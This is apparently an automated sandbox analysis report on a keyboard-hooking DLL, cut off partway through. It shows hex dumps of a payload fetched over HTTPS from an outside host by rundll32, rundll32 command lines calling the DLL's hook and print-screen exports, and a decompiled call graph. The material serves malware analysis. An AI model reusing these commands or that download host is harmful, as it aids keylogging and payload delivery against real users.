                  2024-12-19 13:48:13 UTC1369INData Raw: 26 62 4d d1 be 75 b8 4a 20 9f a1 38 3d 90 83 c6 9a 08 92 44 a1 ed 83 1c d6 0a 36 51 64 62 d5 dd f8 af 84 fd 61 e6 99 b1 e9 a9 d9 fb cd 6f 32 26 43 94 64 af e4 f4 6b 65 f1 b6 56 98 de 7b a4 c0 5f e4 64 2e 1f 75 3a d8 7c 8b c5 ca 67 f3 78 a0 28 b6 b4 4d 4b db 6d 9a d7 85 14 85 8d dc 33 e3 06 42 33 d5 51 5f 6a ea 15 ec b9 25 fa d7 70 8e b2 c0 6c 84 53 01 27 c4 da ba 6f d0 02 a9 36 a4 88 98 06 8c 54 53 37 f4 a7 f2 65 57 b6 1e 19 c3 3f 8e 1d a4 79 7f f7 63 ad 02 5f 12 9c c4 36 a1 e0 cd 3e dd 15 99 e6 03 c3 73 74 ad 31 42 74 eb 91 ae 38 12 a7 1e 00 95 32 f9 28 46 89 df fc 51 b1 35 1e 64 42 c5 02 c3 d0 c5 6a 20 f1 05 15 76 06 a6 36 6e 39 1c ce 19 08 dd d2 28 82 b6 f1 84 1b e7 86 cd 35 72 ae b7 02 81 15 cb 1d 97 f1 fb 94 37 44 25 87 52 54 6f 55 e2 72 b2 6e 2c 8f
                  Data Ascii: &bMuJ 8=D6Qdbao2&CdkeV{_d.u:|gx(MKm3B3Q_j%plS'o6TS7eW?yc_6>st1Bt82(FQ5dBj v6n9(5r7D%RToUrn,


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.649726104.21.40.2144432536C:\Windows\SysWOW64\rundll32.exe
                  TimestampBytes transferredDirectionData
                  2024-12-19 13:48:12 UTC68OUTGET /yj/update.xml HTTP/1.1
                  Host: www.dj5a2sbj.icu
                  Accept: */*
                  2024-12-19 13:48:13 UTC853INHTTP/1.1 200 OK
                  Date: Thu, 19 Dec 2024 13:48:13 GMT
                  Content-Type: text/xml
                  Content-Length: 320512
                  Connection: close
                  Last-Modified: Sun, 15 Dec 2024 02:29:11 GMT
                  ETag: "675e3ef7-4e400"
                  Accept-Ranges: bytes
                  cf-cache-status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mihVhZq9GIwZ7%2BqtFDR4krYwwNIa0KDh07iwCUDcyx4HtpDmuFFib5XuFniGInbgCulw3dvuBza8wkmN0WereRjkVCLtMM3zA6aS0z7re5H2yK6sZEYKKndpsIJbQo2HTDbD"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8f47d955ba6bde95-EWR
                  alt-svc: h3=":443"; ma=86400
                  server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1586&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=706&delivery_rate=1798029&cwnd=240&unsent_bytes=0&cid=0814044d37013961&ts=895&x=0"
                  2024-12-19 13:48:13 UTC516INData Raw: 28 a9 62 b7 f0 dc 23 d2 c5 a4 e7 83 c2 45 95 3d 09 a5 20 1e ae f5 1e 4a 14 cb 38 85 1e 36 36 57 30 4f 47 bb b8 e2 88 c2 e6 e9 79 08 bd b2 d0 2e 2d 75 ee e4 f6 03 05 0b 9d bf c6 c2 87 a1 c1 3c 17 fd 24 58 53 ad 5e 29 49 89 7a a0 fc a9 89 a8 82 3f b6 7c a2 4a d7 d7 2b 4c ab 40 8a 53 2d 7f b9 7b a5 46 ab ef 0b 32 21 ad e5 1c 32 8c 26 33 b3 8c b3 73 f6 9c 14 a0 ad 84 37 91 ca 53 e5 a1 6f 54 38 d1 41 9a 5a aa 66 7f d0 16 3a e1 b6 43 58 37 4b be b1 10 0d d0 73 80 9e 76 0a da 3e c6 26 fe d4 03 58 0b ba dc 95 80 22 80 92 35 73 9f e6 a6 48 0a 45 52 6b e4 5e 93 00 b3 46 43 ed 99 86 a4 79 41 d0 54 de 34 31 0c 3c 55 ea e3 0c 13 9f db 58 ee 56 25 c7 0f 81 a5 b3 57 ce dd cc 15 02 d0 5b 57 d2 c1 ad 05 ad 4f 5a 6b 62 61 b6 86 5c f9 71 8f 94 18 d0 ba 08 bb c1 28 5e 3d a8
                  Data Ascii: (b#E= J866W0OGy.-u<$XS^)Iz?|J+L@S-{F2!2&3s7SoT8AZf:CX7Ksv>&X"5sHERk^FCyAT41<UXV%W[WOZkba\q(^=
                  2024-12-19 13:48:13 UTC1369INData Raw: 14 2c 5a d6 f6 eb 4a 89 f4 4e 6c 51 f5 2f 93 a1 2a e8 60 ad a7 7f 2b 14 9b 57 a0 d4 ca 24 cb 34 21 c4 aa 0e 83 bc 8e bb 9e 59 ce a0 f2 42 cb 8b 1d 9e 7a 03 5f 0d 1b 10 eb e1 7c 4e f5 e6 6d 53 66 56 d1 87 16 dd 72 b2 3f 2f 01 e2 b6 47 7d 1d d7 79 bc 5c bf d7 c4 b4 84 f7 c3 57 48 c7 79 66 e7 12 11 41 d6 a0 2b 80 1d 65 8e c7 49 36 cd d9 9c a8 3d 82 22 4e 2b c1 8b d2 30 64 d4 00 80 21 82 29 22 1b b1 4b ae 5c 99 c0 f5 fa b1 71 48 7d ef 2b f6 db df 3d d1 b7 76 7e 5e 55 e0 c1 09 b6 f8 c2 82 4b ba f1 e4 7d 9d 72 df e9 3e 0c 52 7a f5 83 2d 28 ad 73 87 08 78 ea 6d f9 4f 63 da 5d 36 84 fe e9 bc 20 70 07 ec 15 73 12 ef 06 26 ad 4f 33 59 ff fe de ae 50 d0 78 54 71 9c 36 9a 97 45 75 a6 42 ae b1 89 8a e1 cc e3 b3 ae 20 c4 21 6d 3c fc 92 da db 92 8d 31 cb 53 26 a0 b1 b9
                  Data Ascii: ,ZJNlQ/*`+W$4!YBz_|NmSfVr?/G}y\WHyfA+eI6="N+0d!)"K\qH}+=v~^UK}r>Rz-(sxmOc]6 ps&O3YPxTq6EuB !m<1S&
                  2024-12-19 13:48:13 UTC1369INData Raw: 18 5f 5c 3a 58 5e 1d a1 2e 1d a1 56 60 ad f3 a8 89 64 c7 18 34 fe 0d 7d 2c cf 0b 1e 05 5d 9b 8f 32 a2 b6 c6 a4 6c db 35 b5 86 9e 7f c9 b3 1d 58 5c ad 3e b1 99 6b ca b1 8d a6 1f 35 cc d0 41 46 0a ed 07 d4 0e 8e c2 9a 43 16 7b 92 d4 22 43 f8 a4 73 65 8a ab f6 ad 0c 9c 86 02 8a 42 f4 91 c6 4d df 7f bb c5 00 53 89 85 4f 1a fe 8f 0b 57 2e db f1 b1 f0 9f 9a 45 bf 17 de 8f 06 cc 42 31 a8 c2 28 f9 b2 b1 d0 84 f0 d9 ad cf 22 b5 6b 64 c7 48 e1 df d8 e5 2e 4a 89 60 cf 00 ae bc 0f 4f c4 d2 03 85 37 2f 56 46 92 34 5c a1 e4 4f d7 48 e5 38 cc 86 1c 98 5e 31 b1 86 bf 0b bc b8 14 66 6f 9b dc b1 17 08 9a 6f f0 5b 95 2a 08 3b 93 9d 73 36 8f e6 63 5e aa a5 0e 64 d8 f2 f5 b8 ed 2d 23 45 de f5 29 d9 c4 91 98 f2 65 9e ee f5 6e 9f 35 2d cb 7a a3 46 d0 14 31 eb 0a 7d a1 cc 53 9b
                  Data Ascii: _\:X^.V`d4},]2l5X\>k5AFC{"CseBMSOW.EB1("kdH.J`O7/VF4\OH8^1foo[*;s6c^d-#E)en5-zF1}S
                  2024-12-19 13:48:13 UTC1369INData Raw: c1 38 c0 a3 08 3d 65 2c 06 3b 5c dc 2f cf 16 51 9a 03 73 13 2e c5 e5 0a 56 82 17 45 d1 dc 01 9e 2d 19 20 fc 41 c8 24 72 e4 63 30 74 dc a0 a6 80 4a 16 4d 1a d9 38 05 ff ef 32 6b 94 4f c5 95 de 7d 9e 9e 0f fd 33 e0 7b 41 de 20 73 bd 61 fd af e5 88 47 0e af 5b 97 37 b4 d1 b5 4f 64 c9 84 3d 98 c2 37 a9 35 9f 6a 75 f0 e4 4e 9a d5 9a 8f a8 6d ff de 59 4f 7a 30 be 02 10 b2 ea 54 d5 05 90 da f2 94 64 19 67 3f 68 9f 7d 05 80 30 af 84 85 3e 09 e2 68 30 0f 5a 86 f0 72 1e c5 96 05 a4 92 28 70 88 a3 26 81 2c e1 d6 64 64 4c 18 5c ab c7 6a e0 7c c0 2b 70 4d 51 07 f9 f3 35 8f 26 bb 07 91 fe 97 5c 10 ed 0e 44 5e aa 4a d3 8b f1 9c 96 d4 d9 f9 87 24 2d 87 f6 f4 56 65 b9 f0 36 e6 28 52 86 30 4c cf 39 19 ba 89 ac 50 48 78 3e 3c c3 6d 29 17 4a ff b6 57 cb d0 44 98 60 92 c8 0a
                  Data Ascii: 8=e,;\/Qs.VE- A$rc0tJM82kO}3{A saG[7Od=75juNmYOz0Tdg?h}0>h0Zr(p&,ddL\j|+pMQ5&\D^J$-Ve6(R0L9PHx><m)JWD`
                  2024-12-19 13:48:13 UTC1369INData Raw: 24 3a 52 77 59 28 4a 18 72 a6 4b 6d c0 1f 87 ff 0a b0 ba e0 aa 80 07 df e8 ac 1c 59 30 32 18 a2 41 df ef c6 92 ad 52 47 d3 4e 21 66 c2 b5 8f 25 ff 2d 10 35 f7 a5 78 c9 36 3d 1a 59 bf 30 d2 54 03 e5 c3 b9 b2 7d 04 58 6c 28 f6 c4 1a 8a b8 4a d7 a8 f5 fd 1b e1 0c 43 29 ac a0 eb cf ba d7 f2 88 a3 bf e1 ea eb e1 71 8d f2 a0 64 17 fd 51 bd bb 36 fe de c4 3d c4 8b 72 f0 c9 66 45 91 f0 95 17 89 aa ac f1 bd c5 d6 ec 99 96 2a 01 74 86 42 45 a2 d6 00 0f 4b 7c 86 3c 3b 83 72 a0 65 be e9 3b ab 3d 99 cb cb 37 66 5b ef e2 82 05 aa 6a a5 9c ba a0 85 03 2f 13 f4 fd ed 19 14 53 05 9e 19 88 b2 94 5f e8 ee 83 0a a4 70 fa f2 6d 16 01 84 4d a1 fb 23 24 b3 d0 8a e4 2d 4f e1 b7 ad b4 28 ca 86 48 29 3e 34 8a 3d 2f ce 1e ad 73 1f 6b 23 31 a6 e1 2e 4f cc 47 48 8b 26 61 39 1f c4 7f
                  Data Ascii: $:RwY(JrKmY02ARGN!f%-5x6=Y0T}Xl(JC)qdQ6=rfE*tBEK|<;re;=7f[j/S_pmM#$-O(H)>4=/sk#1.OGH&a9
                  2024-12-19 13:48:13 UTC1369INData Raw: f0 a4 4b 57 b6 7f 63 30 e2 0c a5 b4 73 c1 bc 60 41 a8 43 1c 39 32 ce 37 39 d0 a1 b1 d4 4c 96 43 98 7e 81 3d 2c 18 35 b2 56 66 89 dc 24 e2 6c f2 c8 45 0f 1e 76 71 e0 0a ff 42 32 1a 92 38 24 45 cf 93 4c 04 57 e9 c9 c9 42 61 58 60 32 b1 3b 77 d4 e5 ef 30 ff a5 b2 dd e4 37 2a 2d eb e2 5f df 80 37 74 1a 6d fb 9e 11 d4 46 56 13 a8 4a 69 59 2e 3c 71 ca fd 44 46 00 60 96 86 c9 a5 c9 dc 05 ad c9 47 29 2b a7 52 db dc 85 fa fe e8 2b c6 88 50 2c c6 ea 9a ab 34 8a 5d 3e 1b ef 32 2c d2 d1 bf 55 20 5e 0a 19 f3 72 fd c7 07 50 30 fa c5 42 b3 35 67 0e e0 04 c7 c5 18 d4 27 fb b1 0d b9 27 9c f1 e9 a9 9c 44 89 1b 09 ee a4 af c5 40 0e 1a b9 00 9d bd 19 b8 2c 5b 4b 9f 69 8e 9c 22 be fc c7 b5 de 11 df b0 fa 01 7d 0f 13 0f f1 91 5d 9f 8b 5c aa a5 8b dc 44 25 46 32 14 ca 8e 4e 44
                  Data Ascii: KWc0s`AC9279LC~=,5Vf$lEvqB28$ELWBaX`2;w07*-_7tmFVJiY.<qDF`G)+R+P,4]>2,U ^rP0B5g''D@,[Ki"}]\D%F2ND
                  2024-12-19 13:48:13 UTC1369INData Raw: 75 cf 36 28 b6 ac af c2 4a 17 0c de 46 d0 d0 52 ff 94 12 b0 6b f1 6e 8e 61 9e 50 dd 40 12 d6 f1 67 ff ee 9d 3e 27 cc 95 0b fb d2 1b 08 1a 1a 1c f5 b3 b8 60 cc e5 f7 a4 63 dc 15 fa 76 68 09 a0 8b 58 87 96 0a fa a4 fc a5 d5 44 23 4b bc 06 81 82 84 67 b4 89 11 1d 67 77 59 9a 3f 70 f7 00 f7 44 d9 49 64 cb 21 1a 09 a5 44 38 5d eb 8a 86 83 53 1c b9 50 3f 66 9e 80 fb b5 fc f8 90 d0 4b 8a 68 08 6a d6 32 82 13 94 44 de 76 45 2f e7 46 21 02 30 51 90 89 33 bf 51 c0 83 fc a2 e5 22 ab 5b 8c b9 47 55 5d bc 8e 54 65 16 c6 0c 34 63 57 d4 84 d1 4e 36 ba 05 d5 88 56 f3 80 25 a4 ae 22 b2 1d 41 9c 13 a0 3a 8b a4 53 b5 f9 32 14 ab 4a 94 96 93 84 ef e8 1d 4a cb 4b 2e bc de 14 a0 8b c5 0e 75 86 8d 52 6b eb 35 5b ff 90 84 64 47 29 3c 38 a8 40 c1 2f 4d cd 2b 84 e3 e4 f2 38 7e cb
                  Data Ascii: u6(JFRknaP@g>'`cvhXD#KggwY?pDId!D8]SP?fKhj2DvE/F!0Q3Q"[GU]Te4cWN6V%"A:S2JJK.uRk5[dG)<8@/M+8~
                  2024-12-19 13:48:13 UTC1369INData Raw: 6c b2 e6 2b a5 42 6d 04 17 4a 34 b2 94 df 07 29 58 df a6 cd a9 01 d5 1a c1 61 e6 b9 41 ed 55 3a d2 d2 4a b9 44 ff a4 e1 2d d7 e6 3a 4f 5f 07 5a 96 6f 9d b2 2e fb 05 84 07 9f 48 b9 0f 0d 29 45 dd 5d 2f 54 5d c6 bb 3d 1f 01 65 4a 32 e4 9b df 7a 89 77 5e 29 02 b4 35 e1 c4 44 09 78 0a f8 b5 a6 73 f1 d9 5b d4 61 87 31 cc a6 8c e6 f8 70 ed 9b 48 b4 c4 e1 b0 d9 ef 8b 43 7d 5a 15 a7 f3 62 46 72 8f 00 ff 80 cd 0f ba 7e 8a c2 f4 26 c9 1b 10 75 a8 fb 19 02 9b c9 0c 7b 7a be 13 40 33 f3 5f 4f 76 c2 65 47 2b 42 ab d0 98 e5 83 ad 9a 67 4c 21 97 bc a1 14 10 84 a1 0f 45 c7 47 d2 ff ee 9e b6 d4 27 ae 8c 6d a4 86 b8 38 67 4e 8d 3b d9 6d be cd 62 92 68 53 e6 ab a4 79 33 b2 de a1 35 a2 21 7b e8 72 2c cc a0 9d 08 30 d3 1f d1 dd 9a e6 12 bb 0f d4 bc ff 5b 85 9b 91 b7 32 02 e7
                  Data Ascii: l+BmJ4)XaAU:JD-:O_Zo.H)E]/T]=eJ2zw^)5Dxs[a1pHC}ZbFr~&u{z@3_OveG+BgL!EG'm8gN;mbhSy35!{r,0[2
                  2024-12-19 13:48:13 UTC1369INData Raw: 91 d1 d0 4e b0 e0 36 55 e7 ed df eb 27 29 99 71 88 3c b0 9a 4b 02 99 64 7e 1a 5d 40 22 21 a9 97 ed a4 5f d9 d8 cd 1c 8c 1a 26 3e d7 f4 ef 17 99 32 ac 69 81 cd a4 b2 a7 7c c8 a5 53 d2 dc 75 f5 64 00 3e 70 d9 a2 be bd 60 a1 88 2c ac 3b 21 b5 00 86 04 31 37 4e 37 33 99 1a 19 a0 06 10 7a e8 b8 51 2c 71 e7 6d 89 5c 7f 64 d1 7f e4 b4 ae 6d fe 7e ca 6e 73 ef 3c 52 73 ce 0e 0c 0f 4d bb 5c ba 88 04 47 17 63 79 3d aa be 5a 5f d0 97 13 62 28 03 fb 7b 74 04 7b c4 c7 79 59 a9 f0 b1 b7 cd e1 77 97 ca f5 08 f3 90 3d d4 5e 30 16 2d ab ef d3 82 50 a8 ac fb 71 c7 1f 35 e4 ec 45 96 e7 f1 7f 75 6e cb 39 42 15 c1 25 8b 88 33 9a 21 b8 ad cb 3f 7b 17 8b 0f 64 4d b3 ad 36 98 e3 d5 13 b4 df 12 ad 96 d2 2e 12 f9 6a 27 b8 8b eb 47 81 2d f2 76 de 4b c2 8e 39 d6 d6 56 01 00 b3 9b 2b
                  Data Ascii: N6U')q<Kd~]@"!_&>2i|Sud>p`,;!17N73zQ,qm\dm~ns<RsM\Gcy=Z_b({t{yYw=^0-Pq5Eun9B%3!?{dM6.j'G-vK9V+
                  2024-12-19 13:48:13 UTC1369INData Raw: be 75 b8 4a 20 9f a1 38 3d 90 83 c6 9a 08 92 44 a1 ed 83 1c d6 0a 36 51 64 62 d5 dd f8 af 84 fd 61 e6 99 b1 e9 a9 d9 fb cd 6f 32 26 43 94 64 af e4 f4 6b 65 f1 b6 56 98 de 7b a4 c0 5f e4 64 2e 1f 75 3a d8 7c 8b c5 ca 67 f3 78 a0 28 b6 b4 4d 4b db 6d 9a d7 85 14 85 8d dc 33 e3 06 42 33 d5 51 5f 6a ea 15 ec b9 25 fa d7 70 8e b2 c0 6c 84 53 01 27 c4 da ba 6f d0 02 a9 36 a4 88 98 06 8c 54 53 37 f4 a7 f2 65 57 b6 1e 19 c3 3f 8e 1d a4 79 7f f7 63 ad 02 5f 12 9c c4 36 a1 e0 cd 3e dd 15 99 e6 03 c3 73 74 ad 31 42 74 eb 91 ae 38 12 a7 1e 00 95 32 f9 28 46 89 df fc 51 b1 35 1e 64 42 c5 02 c3 d0 c5 6a 20 f1 05 15 76 06 a6 36 6e 39 1c ce 19 08 dd d2 28 82 b6 f1 84 1b e7 86 cd 35 72 ae b7 02 81 15 cb 1d 97 f1 fb 94 37 44 25 87 52 54 6f 55 e2 72 b2 6e 2c 8f 6b 4d dd d0
                  Data Ascii: uJ 8=D6Qdbao2&CdkeV{_d.u:|gx(MKm3B3Q_j%plS'o6TS7eW?yc_6>st1Bt82(FQ5dBj v6n9(5r7D%RToUrn,kM


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:08:48:10
                  Start date:19/12/2024
                  Path:C:\Windows\System32\loaddll32.exe
                  Wow64 process (32bit):true
                  Commandline:loaddll32.exe "C:\Users\user\Desktop\Hkeyboard.dll"
                  Imagebase:0xc20000
                  File size:126'464 bytes
                  MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:1
                  Start time:08:48:10
                  Start date:19/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff66e660000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:2
                  Start time:08:48:10
                  Start date:19/12/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1
                  Imagebase:0x1c0000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:3
                  Start time:08:48:10
                  Start date:19/12/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?InstallKBHook@@YAHXZ
                  Imagebase:0x2a0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:4
                  Start time:08:48:10
                  Start date:19/12/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1
                  Imagebase:0x2a0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:7
                  Start time:08:48:13
                  Start date:19/12/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?SetDisablePrintScreen@@YAXH@Z
                  Imagebase:0x2a0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:8
                  Start time:08:48:14
                  Start date:19/12/2024
                  Path:C:\Windows\SysWOW64\dllhost.exe
                  Wow64 process (32bit):true
                  Commandline:dllhost.exe
                  Imagebase:0xf0000
                  File size:19'256 bytes
                  MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:false

                  Target ID:9
                  Start time:08:48:16
                  Start date:19/12/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?UnInstallKBHook@@YAHXZ
                  Imagebase:0x2a0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:10
                  Start time:08:48:18
                  Start date:19/12/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                  Imagebase:0x2a0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:11
                  Start time:08:48:19
                  Start date:19/12/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?InstallKBHook@@YAHXZ
                  Imagebase:0x2a0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:12
                  Start time:08:48:19
                  Start date:19/12/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?SetDisablePrintScreen@@YAXH@Z
                  Imagebase:0x2a0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:13
                  Start time:08:48:19
                  Start date:19/12/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?UnInstallKBHook@@YAHXZ
                  Imagebase:0x2a0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:16
                  Start time:08:48:26
                  Start date:19/12/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                  Imagebase:0x2a0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:19
                  Start time:08:48:34
                  Start date:19/12/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                  Imagebase:0x2a0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Reset < >

                    Execution Graph

                    Execution Coverage:3.5%
                    Dynamic/Decrypted Code Coverage:28.8%
                    Signature Coverage:13.9%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:55
                    execution_graph 83110 6d00a4e0 83111 6d00a5d0 83110->83111 83112 6d00a61a 83111->83112 83113 6d00a701 83111->83113 83114 6d00a6e6 83111->83114 83120 6d00a6ba 83111->83120 83124 6cff1e50 83111->83124 83115 6d00a72c 83113->83115 83128 6d00a380 82 API calls 2 library calls 83113->83128 83127 6d00a380 82 API calls 2 library calls 83114->83127 83118 6d00a71c 83119 6d00a6f1 83120->83112 83129 6d00a380 82 API calls 2 library calls 83120->83129 83122 6d00a7df 83130 6cff3ac0 83124->83130 83127->83119 83128->83118 83129->83122 83131 6cff3b05 83130->83131 83132 6cff3b1e 83131->83132 83145 6cff4440 54 API calls CatchGuardHandler 83131->83145 83135 6cff3b53 83132->83135 83140 6cff2bb0 83132->83140 83146 6cff1d10 83135->83146 83136 6cff3bf0 83137 6cff1e6d 83136->83137 83156 6cff4570 54 API calls 83136->83156 83137->83111 83143 6cff2bca _Yarn 83140->83143 83144 6cff2ca8 _Yarn 83140->83144 83141 6cff2d51 83141->83135 83143->83135 83144->83141 83157 6d050dae 83144->83157 83145->83132 83147 6cff1d2a 83146->83147 83147->83136 83149 6cff1d42 83147->83149 83296 6d04a35e ?SetDisablePrintScreen@@YAXH RaiseException 83147->83296 83297 6cff1c20 54 API calls 3 library calls 83149->83297 83151 6cff1d78 83298 6d04a35e ?SetDisablePrintScreen@@YAXH RaiseException 83151->83298 83153 6cff1d87 83299 6d04a2b9 52 API calls 2 library calls 83153->83299 83155 6cff1db4 83155->83136 83156->83137 83158 6d050dc1 _strftime 83157->83158 83163 6d050b90 83158->83163 83160 6d050dd6 83171 6d04ea10 83160->83171 83164 6d050b9e 83163->83164 83165 6d050bc6 83163->83165 83164->83165 83166 6d050bcd 83164->83166 83167 6d050bab 83164->83167 83165->83160 83177 6d050ae9 83166->83177 83185 6d04fc5b 33 API calls 2 library calls 83167->83185 83172 6d04ea1c 83171->83172 83174 6d04ea33 83172->83174 83294 6d04ebe0 52 API calls 2 library calls 83172->83294 83175 6d04ea46 83174->83175 83295 6d04ebe0 52 API calls 2 library calls 83174->83295 83175->83141 83178 6d050af5 __FrameHandler3::FrameUnwindToState 83177->83178 83186 6d051266 EnterCriticalSection 83178->83186 83180 6d050b03 83187 6d050b44 83180->83187 83184 6d050b21 83184->83160 83185->83165 83186->83180 83195 6d0607ee 83187->83195 83193 6d050b10 83194 6d050b38 LeaveCriticalSection __fread_nolock 83193->83194 83194->83184 83214 6d0607b0 83195->83214 83197 6d0607ff 83198 6d050b5c 83197->83198 83199 6d06084e 83197->83199 83204 6d050c07 83198->83204 83221 6d05f83c 18 API calls 3 library calls 83199->83221 83201 6d060858 83222 6d05f802 83201->83222 83205 6d050b7a 83204->83205 83208 6d050c19 83204->83208 83213 6d060899 77 API calls ___scrt_uninitialize_crt 83205->83213 83206 6d050c27 83262 6d04fc5b 33 API calls 2 library calls 83206->83262 83208->83205 83208->83206 83209 6d050c5d _Yarn 83208->83209 83209->83205 83211 6d060774 __fread_nolock 52 API calls 83209->83211 83245 6d0503ce 83209->83245 83251 6d05edc8 83209->83251 83211->83209 83213->83193 83215 6d0607bc 83214->83215 83216 6d0607e6 83215->83216 83228 6d060774 83215->83228 83216->83197 83218 6d0607d7 83235 6d067c97 83218->83235 83220 6d0607dd 83220->83197 83221->83201 83223 6d05f80d RtlFreeHeap 83222->83223 83227 6d05f837 83222->83227 83224 6d05f822 GetLastError 83223->83224 83223->83227 83225 6d05f82f __dosmaperr 83224->83225 83244 6d051f98 17 API calls __dosmaperr 83225->83244 83227->83198 83229 6d060795 83228->83229 83230 6d060780 83228->83230 83229->83218 83231 6d051f98 __dosmaperr 17 API calls 83230->83231 83232 6d060785 83231->83232 83233 6d04fcd8 _strftime 52 API calls 83232->83233 83234 6d060790 83233->83234 83234->83218 83236 6d067ca4 83235->83236 83237 6d067cb1 83235->83237 83238 6d051f98 __dosmaperr 17 API calls 83236->83238 83239 6d067cbd 83237->83239 83240 6d051f98 __dosmaperr 17 API calls 83237->83240 83241 6d067ca9 83238->83241 83239->83220 83242 6d067cde 83240->83242 83241->83220 83243 6d04fcd8 _strftime 52 API calls 83242->83243 83243->83241 83244->83227 83246 6d0503e7 83245->83246 83250 6d05040e 83245->83250 83247 6d060774 __fread_nolock 52 API calls 83246->83247 83246->83250 83248 6d050403 83247->83248 83249 6d05edc8 __wsopen_s 77 API calls 83248->83249 83249->83250 83250->83209 83252 6d05edd4 __FrameHandler3::FrameUnwindToState 83251->83252 83253 6d05ee15 83252->83253 83255 6d05ee5b 83252->83255 83261 6d05eddc 83252->83261 83292 6d04fc5b 33 API calls 2 library calls 83253->83292 83263 6d065a30 EnterCriticalSection 83255->83263 83257 6d05ee61 83258 6d05ee7f 83257->83258 83264 6d05eed9 83257->83264 83293 6d05eed1 LeaveCriticalSection __wsopen_s 83258->83293 83261->83209 83262->83205 83263->83257 83265 6d05ef01 83264->83265 83289 6d05ef24 __fread_nolock 83264->83289 83266 